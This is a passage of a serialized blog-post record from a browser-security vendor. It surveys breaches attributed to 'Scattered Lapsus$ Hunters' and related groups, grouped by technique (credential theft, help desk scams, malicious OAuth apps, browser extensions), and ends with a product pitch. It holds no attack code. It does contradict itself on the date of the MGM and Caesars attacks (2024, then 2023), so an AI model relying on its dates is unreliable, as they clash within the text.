1257},{},[],"Device code phishing is an account takeover technique that abuses the OAuth 2.0 Device Authorization Grant to steal access tokens while bypassing standard access controls (like passwords, MFA, and even passkeys).","text","paragraph","document","Device code phishing attacks have skyrocketed: here’s what you need to know","Analysing the rise in device code phishing attacks in 2026","Device code phishing is seeing a huge spike in adoption in 2026, enabling attackers to steal access tokens while bypassing standard access controls.","2026-04-04T00:00:00.000Z","device-code-phishing",{"items":1266},[1267,1271],{"sys":1268,"name":1270},{"id":1269},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":1272,"name":1274},{"id":1273},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":1276},[1277,2270,3143],{"__typename":1278,"sys":1279,"content":1281,"title":2252,"synopsis":2253,"hashTags":118,"publishedDate":2254,"slug":2255,"tagsCollection":2256,"authorsCollection":2262},"BlogPosts",{"id":1280},"2sFCww9xnI8okIxhtOaiY1",{"json":1282},{"nodeType":1259,"data":1283,"content":1284},{},[1285,1292,1299,1306,1310,1320,1327,1334,1343,1350,1356,1378,1385,1397,1400,1408,1415,1431,1438,1450,1456,1459,1467,1476,1482,1491,1511,1520,1527,1536,1555,1564,1571,1580,1613,1622,1629,1638,1656,1662,1671,1678,1687,1730,1733,1741,1750,1770,1779,1786,1795,1828,1834,1843,1850,1856,1859,1867,1876,1883,1945,1951,1954,1962,1971,1978,1984,1987,1995,2002,2009,2079,2086,2149,2156,2159,2167,2174,2181,2187,2190,2198,2205,2212,2219],{"nodeType":1258,"data":1286,"content":1287},{},[1288],{"nodeType":1257,"value":1289,"marks":1290,"data":1291},"The biggest cybersecurity story this year (so far) has been the emergence of “Scattered Lapsus$ Hunters” and their record-breaking worldwide hacking spree. 
",[],{},{"nodeType":1258,"data":1293,"content":1294},{},[1295],{"nodeType":1257,"value":1296,"marks":1297,"data":1298},"Scattered Lapsus$ Hunters is part of “The Com”, the name for the broad community of English-speaking cybercriminals with international criminal connections — including with nation-state sponsored groups. They are also known to collaborate with a range of cybercrime “as-a-Service” organizations for phishing, initial access, ransomware, and more. ",[],{},{"nodeType":1258,"data":1300,"content":1301},{},[1302],{"nodeType":1257,"value":1303,"marks":1304,"data":1305},"It’s difficult to pin down exactly who the individuals are that make up this criminal collective. But what is known is their MO — making money through extortion by means of account takeover, mass data theft, and ransomware deployment. ",[],{},{"nodeType":1307,"data":1308,"content":1309},"hr",{},[],{"nodeType":1311,"data":1312,"content":1313},"heading-1",{},[1314],{"nodeType":1257,"value":1315,"marks":1316,"data":1319},"How did we get here? ",[1317],{"type":1318},"bold",{},{"nodeType":1258,"data":1321,"content":1322},{},[1323],{"nodeType":1257,"value":1324,"marks":1325,"data":1326},"Earlier this year, the threat group known to most analysts as Scattered Spider (also tracked as 0ktapus, Octo Tempest, Scatter Swine, Muddled Libra, and UNC3944) re-emerged after a series of arrests in late 2024. ",[],{},{"nodeType":1258,"data":1328,"content":1329},{},[1330],{"nodeType":1257,"value":1331,"marks":1332,"data":1333},"This group has been active in peaks and troughs over the years, but are mainly known for high-profile ransomware attacks on Caesars and MGM Resorts in 2024. 
",[],{},{"nodeType":1335,"data":1336,"content":1342},"embedded-entry-block",{"target":1337},{"sys":1338},{"id":1339,"type":1340,"linkType":1341},"1Vt269d7n6IGMzOrJs1FDx","Link","Entry",[],{"nodeType":1258,"data":1344,"content":1345},{},[1346],{"nodeType":1257,"value":1347,"marks":1348,"data":1349},"Scattered Spider hit the headlines again in April 2025 with attacks on UK retailers Marks & Spencer and Co-op, which resulted in significant, prolonged disruption, and a serious downstream impact on the retail supply chain. ",[],{},{"nodeType":1335,"data":1351,"content":1355},{"target":1352},{"sys":1353},{"id":1354,"type":1340,"linkType":1341},"3kvcGV2zZZUPnM8IK04Y1O",[],{"nodeType":1258,"data":1357,"content":1358},{},[1359,1363,1374],{"nodeType":1257,"value":1360,"marks":1361,"data":1362},"It didn’t stop there, though. What followed was a wide-scale campaign targeting Salesforce customers, with the attackers claiming to have stolen ",[],{},{"nodeType":1364,"data":1365,"content":1367},"hyperlink",{"uri":1366},"https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billion-salesforce-records-stolen-in-drift-hacks/",[1368],{"nodeType":1257,"value":1369,"marks":1370,"data":1373},"over 1.5 billion records from 1000+ companies",[1371],{"type":1372},"underline",{},{"nodeType":1257,"value":1375,"marks":1376,"data":1377}," across multiple verticals, including heavyweights like Google, Cloudflare, Workday, Adidas, FedEx, Disney, LVMH, and many more.",[],{},{"nodeType":1258,"data":1379,"content":1380},{},[1381],{"nodeType":1257,"value":1382,"marks":1383,"data":1384},"Around this time, the attackers began to refer to themselves as part of a wider collective, assuming the moniker “Scattered Lapsus$ Hunters” (a mash-up of names given by analysts and self-adopted by attackers — Scattered Spider, ShinyHunters, and Lapsus$).",[],{},{"nodeType":1258,"data":1386,"content":1387},{},[1388,1392],{"nodeType":1257,"value":1389,"marks":1390,"data":1391},"The most significant 
breach this year to-date impacted Jaguar Land Rover. A ransomware attack resulted in months of disruption that directly impacted the UK’s GDP, with the government underwriting a $1.5B loan to alleviate the supply chain impact. ",[],{},{"nodeType":1257,"value":1393,"marks":1394,"data":1396},"In fact, this was the most economically consequential cyber attack yet recorded in a G7 economy. ",[1395],{"type":1318},{},{"nodeType":1307,"data":1398,"content":1399},{},[],{"nodeType":1311,"data":1401,"content":1402},{},[1403],{"nodeType":1257,"value":1404,"marks":1405,"data":1407},"2025 wasn’t a one-off",[1406],{"type":1318},{},{"nodeType":1258,"data":1409,"content":1410},{},[1411],{"nodeType":1257,"value":1412,"marks":1413,"data":1414},"The developments through 2025 have presented a stronger picture than ever before that cybercriminal operations are heavily interlinked. Groups overlap considerably, and individuals freely move between different cells. ",[],{},{"nodeType":1258,"data":1416,"content":1417},{},[1418,1422,1427],{"nodeType":1257,"value":1419,"marks":1420,"data":1421},"When we scratch beneath the surface, this is evident in the tactics, techniques and procedures (TTPs) used by these attackers — even stretching as far back as 2021 with the initial rise of Lapsus$. This is not an accident. ",[],{},{"nodeType":1257,"value":1423,"marks":1424,"data":1426},"The TTPs used show a conscious move by attackers to move away from environments that are well-protected by traditional security tools. ",[1425],{"type":1318},{},{"nodeType":1257,"value":1428,"marks":1429,"data":1430},"This means avoiding targeting endpoints with malware, and not relying on software-based exploits. Instead, these attackers look to take over apps and services directly over the internet. ",[],{},{"nodeType":1258,"data":1432,"content":1433},{},[1434],{"nodeType":1257,"value":1435,"marks":1436,"data":1437},"Most of the time, this is as simple as logging in to a SaaS app, or an enterprise SSO account (e.g. 
Microsoft, Okta, or Google) and dumping the data. For attackers that want to take it further, they can abuse the sprawl of interconnected apps that make up modern business IT, seeking out specific data or exploitable functionality. Or, they can leverage internet-accessible management portals to chart a path back to your on-premise assets, giving them everything they need to pivot toward more conventional methods such as ransomware deployment. ",[],{},{"nodeType":1258,"data":1439,"content":1440},{},[1441,1445],{"nodeType":1257,"value":1442,"marks":1443,"data":1444},"When we look at historical breaches, the pattern is clear. ",[],{},{"nodeType":1257,"value":1446,"marks":1447,"data":1449},"Not one of the attacks attributed to Scattered Lapsus$ Hunters, or its predecessors, started with an endpoint or network attack — they all began with account takeover. ",[1448],{"type":1318},{},{"nodeType":1335,"data":1451,"content":1455},{"target":1452},{"sys":1453},{"id":1454,"type":1340,"linkType":1341},"6poP5VM2ARrEvwKEG42HgK",[],{"nodeType":1307,"data":1457,"content":1458},{},[],{"nodeType":1311,"data":1460,"content":1461},{},[1462],{"nodeType":1257,"value":1463,"marks":1464,"data":1466},"TTP breakdown: Analysing the top “Scattered Lapsus$ Hunters” breaches since 2021",[1465],{"type":1318},{},{"nodeType":1468,"data":1469,"content":1470},"heading-2",{},[1471],{"nodeType":1257,"value":1472,"marks":1473,"data":1475},"Phishing and stolen credentials",[1474],{"type":1318},{},{"nodeType":1335,"data":1477,"content":1481},{"target":1478},{"sys":1479},{"id":1480,"type":1340,"linkType":1341},"4SNOanDIdGZsvRRnMYQVSo",[],{"nodeType":1258,"data":1483,"content":1484},{},[1485],{"nodeType":1257,"value":1486,"marks":1487,"data":1490},"EA Games (2021)",[1488,1489],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1492,"content":1493},{},[1494,1498,1507],{"nodeType":1257,"value":1495,"marks":1496,"data":1497},"Attackers used stolen session cookies to log into EA’s Slack instance, purchased 
on a criminal forum. Combined with ",[],{},{"nodeType":1364,"data":1499,"content":1501},{"uri":1500},"https://pushsecurity.com/blog/phishing-slack-persistence/",[1502],{"nodeType":1257,"value":1503,"marks":1504,"data":1506},"social engineering via Slack",[1505],{"type":1372},{},{"nodeType":1257,"value":1508,"marks":1509,"data":1510},", this was used to steal 750GB of data, including video game source code. ",[],{},{"nodeType":1258,"data":1512,"content":1513},{},[1514],{"nodeType":1257,"value":1515,"marks":1516,"data":1519},"Nvidia (2022)",[1517,1518],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1521,"content":1522},{},[1523],{"nodeType":1257,"value":1524,"marks":1525,"data":1526},"Attackers used stolen credentials to steal 1TB of data from Nvidia’s internal shares, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code, and the usernames and passwords of more than 71,000 Nvidia employees.",[],{},{"nodeType":1258,"data":1528,"content":1529},{},[1530],{"nodeType":1257,"value":1531,"marks":1532,"data":1535},"Microsoft (2022)",[1533,1534],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1537,"content":1538},{},[1539,1543,1551],{"nodeType":1257,"value":1540,"marks":1541,"data":1542},"Attackers used stolen credentials combined with SIM swapping and ",[],{},{"nodeType":1364,"data":1544,"content":1546},{"uri":1545},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/mfa_fatigue/description.md",[1547],{"nodeType":1257,"value":1548,"marks":1549,"data":1550},"MFA fatigue",[],{},{"nodeType":1257,"value":1552,"marks":1553,"data":1554}," attacks to steal Azure DevOps source code — leaked a 9GB archive of Microsoft source code – including ~90% of Bing and 45% of Cortana code. 
",[],{},{"nodeType":1258,"data":1556,"content":1557},{},[1558],{"nodeType":1257,"value":1559,"marks":1560,"data":1563},"T-Mobile (2022)",[1561,1562],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1565,"content":1566},{},[1567],{"nodeType":1257,"value":1568,"marks":1569,"data":1570},"Attackers used stolen credentials to establish initial access, coupled with social engineering T-Mobile staff into approving the attacker’s device for VPN access. This resulted in source code being stolen from over 30,000 repositories. ",[],{},{"nodeType":1258,"data":1572,"content":1573},{},[1574],{"nodeType":1257,"value":1575,"marks":1576,"data":1579},"Snowflake (165 customers) (2024)",[1577,1578],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1581,"content":1582},{},[1583,1587,1596,1600,1609],{"nodeType":1257,"value":1584,"marks":1585,"data":1586},"Attackers targeted ",[],{},{"nodeType":1364,"data":1588,"content":1590},{"uri":1589},"https://pushsecurity.com/blog/snowflake-retro/",[1591],{"nodeType":1257,"value":1592,"marks":1593,"data":1595},"165 Snowflake customers",[1594],{"type":1372},{},{"nodeType":1257,"value":1597,"marks":1598,"data":1599}," using stolen credentials from credential breaches dating back as far as 2020. Due to widespread MFA gaps and the presence of ",[],{},{"nodeType":1364,"data":1601,"content":1603},{"uri":1602},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/ghost_logins/description.md",[1604],{"nodeType":1257,"value":1605,"marks":1606,"data":1608},"ghost logins",[1607],{"type":1372},{},{"nodeType":1257,"value":1610,"marks":1611,"data":1612},", attackers were able to simply log in to individual customer tenants, dump the data, and use it to extort the companies. In total, 9 public victims were named following the breach, with over 1B breached customer records. 
",[],{},{"nodeType":1258,"data":1614,"content":1615},{},[1616],{"nodeType":1257,"value":1617,"marks":1618,"data":1621},"PowerSchool (2024)",[1619,1620],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1623,"content":1624},{},[1625],{"nodeType":1257,"value":1626,"marks":1627,"data":1628},"Attackers gained access to a community-focused customer support portal, PowerSource, using compromised credentials and stole data using an \"export data manager\" customer support tool, stealing the data of 62.4 million students and 9.5 million teachers. PowerSchool paid an undisclosed ransom fee, but hackers returned later to extort schools and individuals separately anyway.",[],{},{"nodeType":1258,"data":1630,"content":1631},{},[1632],{"nodeType":1257,"value":1633,"marks":1634,"data":1637},"Red Hat (2025)",[1635,1636],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1639,"content":1640},{},[1641,1645,1652],{"nodeType":1257,"value":1642,"marks":1643,"data":1644},"Attackers breached Red Hat’s GitLab instance via a compromised account — the result of ",[],{},{"nodeType":1364,"data":1646,"content":1647},{"uri":1602},[1648],{"nodeType":1257,"value":1605,"marks":1649,"data":1651},[1650],{"type":1372},{},{"nodeType":1257,"value":1653,"marks":1654,"data":1655}," providing a backdoor to access an otherwise secure, SSO-connected account. Stolen data included approximately 800 Customer Engagement Reports (CERs), authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure. 
",[],{},{"nodeType":1335,"data":1657,"content":1661},{"target":1658},{"sys":1659},{"id":1660,"type":1340,"linkType":1341},"G1V7d5Dvevmr9p0YXElPX",[],{"nodeType":1258,"data":1663,"content":1664},{},[1665],{"nodeType":1257,"value":1666,"marks":1667,"data":1670},"Discord (2025)",[1668,1669],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1672,"content":1673},{},[1674],{"nodeType":1257,"value":1675,"marks":1676,"data":1677},"Attackers compromised a Zendesk customer support account, stealing 1.6TB of data. The hackers say this consisted of roughly 8.4 million tickets affecting 5.5 million unique users, and that about 580,000 users contained payment information.",[],{},{"nodeType":1258,"data":1679,"content":1680},{},[1681],{"nodeType":1257,"value":1682,"marks":1683,"data":1686},"SoundCloud, MatchGroup, Crunchbase, Betterment... (2026)",[1684,1685],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1688,"content":1689},{},[1690,1694,1702,1706,1714,1718,1726],{"nodeType":1257,"value":1691,"marks":1692,"data":1693},"Scattered Lapsus$ Hunters have already claimed several public victims in 2026, with over 60 million breached records. 
",[],{},{"nodeType":1364,"data":1695,"content":1697},{"uri":1696},"https://www.bleepingcomputer.com/news/security/shinyhunters-claim-to-be-behind-sso-account-data-theft-attacks/",[1698],{"nodeType":1257,"value":1699,"marks":1700,"data":1701},"SoundCloud, Betterment, Crunchbase",[],{},{"nodeType":1257,"value":1703,"marks":1704,"data":1705}," and ",[],{},{"nodeType":1364,"data":1707,"content":1709},{"uri":1708},"https://www.bleepingcomputer.com/news/security/match-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match/",[1710],{"nodeType":1257,"value":1711,"marks":1712,"data":1713},"MatchGroup",[],{},{"nodeType":1257,"value":1715,"marks":1716,"data":1717}," have all reported breaches this month, powered by a brand ",[],{},{"nodeType":1364,"data":1719,"content":1721},{"uri":1720},"https://pushsecurity.com/blog/unpacking-the-latest-slh-campaign/",[1722],{"nodeType":1257,"value":1723,"marks":1724,"data":1725},"new real-time-operated AiTM phishing kit",[],{},{"nodeType":1257,"value":1727,"marks":1728,"data":1729}," targeting Okta, Entra, and Google SSO accounts. This is a developing situation, with more victims expected to be announced publicly soon.",[],{},{"nodeType":1307,"data":1731,"content":1732},{},[],{"nodeType":1468,"data":1734,"content":1735},{},[1736],{"nodeType":1257,"value":1737,"marks":1738,"data":1740},"Vishing and help desk scams",[1739],{"type":1318},{},{"nodeType":1258,"data":1742,"content":1743},{},[1744],{"nodeType":1257,"value":1745,"marks":1746,"data":1749},"MGM Resorts & Caesars (2023)",[1747,1748],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1751,"content":1752},{},[1753,1757,1766],{"nodeType":1257,"value":1754,"marks":1755,"data":1756},"MGM Resorts and Caesars were hit with twin breaches in 2023. 
Attackers socially engineered help desk personnel to take over accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",[],{},{"nodeType":1364,"data":1758,"content":1760},{"uri":1759},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/inbound_federation/description.md",[1761],{"nodeType":1257,"value":1762,"marks":1763,"data":1765},"inbound federation",[1764],{"type":1372},{},{"nodeType":1257,"value":1767,"marks":1768,"data":1769}," — granting comprehensive access that was used to deploy ransomware. ",[],{},{"nodeType":1258,"data":1771,"content":1772},{},[1773],{"nodeType":1257,"value":1774,"marks":1775,"data":1778},"Transport for London (2024)",[1776,1777],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1780,"content":1781},{},[1782],{"nodeType":1257,"value":1783,"marks":1784,"data":1785},"Attackers socially engineered the Transport for London help desk to gain privileged access to the IT environment, resulting in prolonged disruption to key online services underpinning London’s public transport network, theft of 5,000 users’ bank details, and all 30,000 staff members having to reset their online credentials in person.",[],{},{"nodeType":1258,"data":1787,"content":1788},{},[1789],{"nodeType":1257,"value":1790,"marks":1791,"data":1794},"Marks & Spencer (2025)",[1792,1793],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1796,"content":1797},{},[1798,1802,1811,1815,1824],{"nodeType":1257,"value":1799,"marks":1800,"data":1801},"Attackers compromised a Microsoft Entra account belonging to a privileged user via a ",[],{},{"nodeType":1364,"data":1803,"content":1805},{"uri":1804},"https://pushsecurity.com/blog/scattered-spider-defending-against-help-desk-scams/",[1806],{"nodeType":1257,"value":1807,"marks":1808,"data":1810},"help desk scam",[1809],{"type":1372},{},{"nodeType":1257,"value":1812,"marks":1813,"data":1814},", which enabled them to steal 
sensitive data from cloud environments, as well as pivot to deploy ransomware via the ",[],{},{"nodeType":1364,"data":1816,"content":1818},{"uri":1817},"https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks",[1819],{"nodeType":1257,"value":1820,"marks":1821,"data":1823},"VMware admin console",[1822],{"type":1372},{},{"nodeType":1257,"value":1825,"marks":1826,"data":1827},". This enabled ransomware to be deployed at the hypervisor layer, evading host-based protections like EDR. ",[],{},{"nodeType":1335,"data":1829,"content":1833},{"target":1830},{"sys":1831},{"id":1832,"type":1340,"linkType":1341},"7hBdHG74NaA3bQfOMpYA9o",[],{"nodeType":1258,"data":1835,"content":1836},{},[1837],{"nodeType":1257,"value":1838,"marks":1839,"data":1842},"Jaguar Land Rover (2025)",[1840,1841],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1844,"content":1845},{},[1846],{"nodeType":1257,"value":1847,"marks":1848,"data":1849},"Attackers compromised highly privileged admin accounts via a help desk scam, which they leveraged to access and deploy ransomware to all aspects of Jaguar’s business, from CAD and engineering software, to payments tracking, to customer car delivery, using similar techniques to the Marks & Spencer breach. 
",[],{},{"nodeType":1335,"data":1851,"content":1855},{"target":1852},{"sys":1853},{"id":1854,"type":1340,"linkType":1341},"6s1X2fo4K9EeVLBmHm4YXb",[],{"nodeType":1307,"data":1857,"content":1858},{},[],{"nodeType":1468,"data":1860,"content":1861},{},[1862],{"nodeType":1257,"value":1863,"marks":1864,"data":1866},"Malicious OAuth integrations",[1865],{"type":1318},{},{"nodeType":1258,"data":1868,"content":1869},{},[1870],{"nodeType":1257,"value":1871,"marks":1872,"data":1875},"Salesforce & Salesloft (1000+ customers) (2025)",[1873,1874],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1877,"content":1878},{},[1879],{"nodeType":1257,"value":1880,"marks":1881,"data":1882},"A vast campaign against Salesforce customers resulted in the compromise of 1000+ Salesforce tenants (according to the attacker) with more than 1.5 billion records stolen. This campaign consisted of three phases:",[],{},{"nodeType":1884,"data":1885,"content":1886},"unordered-list",{},[1887,1903,1918],{"nodeType":1888,"data":1889,"content":1890},"list-item",{},[1891],{"nodeType":1258,"data":1892,"content":1893},{},[1894,1899],{"nodeType":1257,"value":1895,"marks":1896,"data":1898},"Phase 1:",[1897],{"type":1318},{},{"nodeType":1257,"value":1900,"marks":1901,"data":1902}," The attacker conducted a large-scale vishing campaign against Salesforce customers, calling up users and socially engineering them into connecting a malicious version of the “Data Loader” app into their tenant. This was in fact an attacker-controlled app that enabled data to be mass-exfiltrated via API. ",[],{},{"nodeType":1888,"data":1904,"content":1905},{},[1906],{"nodeType":1258,"data":1907,"content":1908},{},[1909,1914],{"nodeType":1257,"value":1910,"marks":1911,"data":1913},"Phase 2: ",[1912],{"type":1318},{},{"nodeType":1257,"value":1915,"marks":1916,"data":1917},"The attacker conducted a supply-chain compromise against customers of Salesloft. 
Users of Salesloft’s “Drift” integration were impacted by attackers stealing access tokens from Salesloft’s AWS environment. This integration allowed the attacker to steal data from customers that had deployed Drift to connected environments — namely, Salesforce, and Google Workspace. ",[],{},{"nodeType":1888,"data":1919,"content":1920},{},[1921],{"nodeType":1258,"data":1922,"content":1923},{},[1924,1929,1933,1941],{"nodeType":1257,"value":1925,"marks":1926,"data":1928},"Phase 3:",[1927],{"type":1318},{},{"nodeType":1257,"value":1930,"marks":1931,"data":1932}," The attacker then conducted a separate supply-chain compromise involving Gainsight (allegedly using OAuth tokens stolen in the Salesloft attack) which enabled them to ",[],{},{"nodeType":1364,"data":1934,"content":1936},{"uri":1935},"https://www.bleepingcomputer.com/news/security/salesforce-investigates-customer-data-theft-via-gainsight-breach/",[1937],{"nodeType":1257,"value":1938,"marks":1939,"data":1940},"breach a further 285 Salesforce instances",[],{},{"nodeType":1257,"value":1942,"marks":1943,"data":1944}," using stolen OAuth tokens from Gainsight's integrations. 
",[],{},{"nodeType":1335,"data":1946,"content":1950},{"target":1947},{"sys":1948},{"id":1949,"type":1340,"linkType":1341},"3TwjpVKQ42SwQRhvGFbZdn",[],{"nodeType":1307,"data":1952,"content":1953},{},[],{"nodeType":1468,"data":1955,"content":1956},{},[1957],{"nodeType":1257,"value":1958,"marks":1959,"data":1961},"Malicious browser extensions",[1960],{"type":1318},{},{"nodeType":1258,"data":1963,"content":1964},{},[1965],{"nodeType":1257,"value":1966,"marks":1967,"data":1970},"CyberHaven (2024)",[1968,1969],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":1972,"content":1973},{},[1974],{"nodeType":1257,"value":1975,"marks":1976,"data":1977},"Hackers phished a CyberHaven extension developer and uploaded a malicious version of the CyberHaven extension to the Chrome Web Store, leading to customer data breaches where installed in user browsers, impacting CyberHaven’s estimated ~400 business customers. This was part of a broader campaign that targeted 35 Chrome extensions, collectively impacting over 2.5 million users.",[],{},{"nodeType":1335,"data":1979,"content":1983},{"target":1980},{"sys":1981},{"id":1982,"type":1340,"linkType":1341},"4ErDI0xi0Vj2Zrk8Qsb2NB",[],{"nodeType":1307,"data":1985,"content":1986},{},[],{"nodeType":1311,"data":1988,"content":1989},{},[1990],{"nodeType":1257,"value":1991,"marks":1992,"data":1994},"The bigger picture",[1993],{"type":1318},{},{"nodeType":1258,"data":1996,"content":1997},{},[1998],{"nodeType":1257,"value":1999,"marks":2000,"data":2001},"Scattered Lapsus$ Hunters are dominating the headlines right now, but they aren’t the only attackers using these modern techniques and consciously evading established security controls. 
",[],{},{"nodeType":1258,"data":2003,"content":2004},{},[2005],{"nodeType":1257,"value":2006,"marks":2007,"data":2008},"Threat reports agree that attackers are steering away from traditional exploit and malware-driven breaches towards identities:",[],{},{"nodeType":1884,"data":2010,"content":2011},{},[2012,2035,2057],{"nodeType":1888,"data":2013,"content":2014},{},[2015],{"nodeType":1258,"data":2016,"content":2017},{},[2018,2022,2031],{"nodeType":1257,"value":2019,"marks":2020,"data":2021},"Identity-based attacks surged 32% in the last year, while 97% of identity attacks are password-based, driven by credential leaks and infostealer malware. (",[],{},{"nodeType":1364,"data":2023,"content":2025},{"uri":2024},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[2026],{"nodeType":1257,"value":2027,"marks":2028,"data":2030},"Microsoft",[2029],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":2033,"data":2034},")",[],{},{"nodeType":1888,"data":2036,"content":2037},{},[2038],{"nodeType":1258,"data":2039,"content":2040},{},[2041,2045,2054],{"nodeType":1257,"value":2042,"marks":2043,"data":2044},"79% of detections were malware-free in the last year, up from 40% in 2019. (",[],{},{"nodeType":1364,"data":2046,"content":2048},{"uri":2047},"https://www.crowdstrike.com/en-gb/global-threat-report/",[2049],{"nodeType":1257,"value":2050,"marks":2051,"data":2053},"CrowdStrike",[2052],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":2055,"data":2056},[],{},{"nodeType":1888,"data":2058,"content":2059},{},[2060],{"nodeType":1258,"data":2061,"content":2062},{},[2063,2067,2076],{"nodeType":1257,"value":2064,"marks":2065,"data":2066},"Credential abuse and phishing combined accounted for 38% of breaches, making identity the primary breach vector observed. 
(",[],{},{"nodeType":1364,"data":2068,"content":2070},{"uri":2069},"https://www.verizon.com/business/resources/reports/dbir/",[2071],{"nodeType":1257,"value":2072,"marks":2073,"data":2075},"Verizon",[2074],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":2077,"data":2078},[],{},{"nodeType":1258,"data":2080,"content":2081},{},[2082],{"nodeType":1257,"value":2083,"marks":2084,"data":2085},"And other public breaches from this year alone demonstrate similar TTPs from outside of the Scattered Lapsus$ Hunters orbit:",[],{},{"nodeType":1884,"data":2087,"content":2088},{},[2089,2104,2119,2134],{"nodeType":1888,"data":2090,"content":2091},{},[2092],{"nodeType":1258,"data":2093,"content":2094},{},[2095,2100],{"nodeType":1257,"value":2096,"marks":2097,"data":2099},"Nikkei",[2098],{"type":1318},{},{"nodeType":1257,"value":2101,"marks":2102,"data":2103},": Japanese publishing giant Nikkei’s Slack messaging platform was compromised using stolen credentials, leaking the names, email addresses, and chat histories for 17,368 individuals registered on Slack.",[],{},{"nodeType":1888,"data":2105,"content":2106},{},[2107],{"nodeType":1258,"data":2108,"content":2109},{},[2110,2115],{"nodeType":1257,"value":2111,"marks":2112,"data":2114},"Evertec",[2113],{"type":1318},{},{"nodeType":1257,"value":2116,"marks":2117,"data":2118},": Hackers tried to steal $130 million from Evertec’s Brazilian subsidiary Sinqia S.A. after gaining unauthorized access to its environment on the central bank’s real-time payment system (Pix) using stolen credentials.",[],{},{"nodeType":1888,"data":2120,"content":2121},{},[2122],{"nodeType":1258,"data":2123,"content":2124},{},[2125,2130],{"nodeType":1257,"value":2126,"marks":2127,"data":2129},"Hy-Vee:",[2128],{"type":1318},{},{"nodeType":1257,"value":2131,"marks":2132,"data":2133}," Was hit with a data breach after hackers logged in with stolen credentials, exposing 53GB of sensitive 
data.",[],{},{"nodeType":1888,"data":2135,"content":2136},{},[2137],{"nodeType":1258,"data":2138,"content":2139},{},[2140,2145],{"nodeType":1257,"value":2141,"marks":2142,"data":2144},"Scania: ",[2143],{"type":1318},{},{"nodeType":1257,"value":2146,"marks":2147,"data":2148},"Automotive giant Scania confirmed it suffered a cybersecurity incident where threat actors used compromised credentials to breach its Financial Services systems and steal insurance claim documents.",[],{},{"nodeType":1258,"data":2150,"content":2151},{},[2152],{"nodeType":1257,"value":2153,"marks":2154,"data":2155},"Scattered Lapsus$ Hunters may be grabbing the headlines — but this is a huge movement in a vast and flexible community of attackers. And criminals around the world are learning from their success. ",[],{},{"nodeType":1307,"data":2157,"content":2158},{},[],{"nodeType":1311,"data":2160,"content":2161},{},[2162],{"nodeType":1257,"value":2163,"marks":2164,"data":2166},"Lessons learned",[2165],{"type":1318},{},{"nodeType":1258,"data":2168,"content":2169},{},[2170],{"nodeType":1257,"value":2171,"marks":2172,"data":2173},"The common thread with all of these attacks is that they are evading established security controls by targeting applications directly, over the internet, via account takeover.",[],{},{"nodeType":1258,"data":2175,"content":2176},{},[2177],{"nodeType":1257,"value":2178,"marks":2179,"data":2180},"Clearly, the success of these attacks shows the limitations of multiple control layers. Endpoint and network layer controls have no visibility of this attack surface. Identity-focused controls are being undermined by ghost logins and shadow IT. And cloud security controls are limited in their ability to encompass all apps, and to detect and stop malicious actions in real time (actions that often blend in seamlessly with normal user activity). 
",[],{},{"nodeType":1335,"data":2182,"content":2186},{"target":2183},{"sys":2184},{"id":2185,"type":1340,"linkType":1341},"4Dg3fZEGf7ShyQJ8jlNDME",[],{"nodeType":1307,"data":2188,"content":2189},{},[],{"nodeType":1311,"data":2191,"content":2192},{},[2193],{"nodeType":1257,"value":2194,"marks":2195,"data":2197},"How Push can help",[2196],{"type":1318},{},{"nodeType":1258,"data":2199,"content":2200},{},[2201],{"nodeType":1257,"value":2202,"marks":2203,"data":2204},"Stopping attacks that are designed to evade established controls is in our DNA — it’s the reason Push was founded. ",[],{},{"nodeType":1258,"data":2206,"content":2207},{},[2208],{"nodeType":1257,"value":2209,"marks":2210,"data":2211},"The browser is the gateway to the apps and identities that attackers are now targeting, with many attacks taking place inside the user’s browser — whether that’s entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA. ",[],{},{"nodeType":1258,"data":2213,"content":2214},{},[2215],{"nodeType":1257,"value":2216,"marks":2217,"data":2218},"Push’s browser-based security platform provides comprehensive detection and response capabilities against attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. 
